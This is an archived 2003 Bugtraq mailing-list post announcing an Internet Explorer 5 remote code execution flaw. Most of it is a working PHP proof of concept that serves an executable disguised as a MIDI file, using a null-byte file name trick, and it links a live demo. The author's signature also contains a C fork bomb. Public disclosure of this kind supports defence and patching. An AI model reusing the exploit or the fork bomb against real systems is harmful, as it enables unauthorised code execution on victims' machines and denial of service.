[32097] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

IE remote code execution

daemon@ATHENA.MIT.EDU (Marcin Ulikowski)
Mon Oct 20 13:11:57 2003

Date: Sun, 19 Oct 2003 00:15:39 +0200 (CEST)
From: Marcin Ulikowski <r3b00t@tx.pl>
To: bugtraq@securityfocus.com
Message-ID: <Pine.LNX.4.44.0310190012380.170-100000@osiris>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

This code can execute any code remotely using IE - as  you can see very simple.

// for IE 5, tested on default Windows 98SE installation
<?php
Header("Content-type: audio/midi");
Header("Content-Disposition: inline; filename=readme.txt%00code.exe");
readfile("code.exe");
?>
<noscript>

Here you have a demo:
http://r3b00t.tx.pl/iexec5.php

Can we expect more surprises like this one?

--
------------------------------
r3b00t ~ [http://r3b00t.tx.pl]
just do main(){for(;;)fork();}
------------------------------


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[32097] in bugtraq

IE remote code execution

daemon@ATHENA.MIT.EDU (Marcin Ulikowski)Mon Oct 20 13:11:57 2003

daemon@ATHENA.MIT.EDU (Marcin Ulikowski)
Mon Oct 20 13:11:57 2003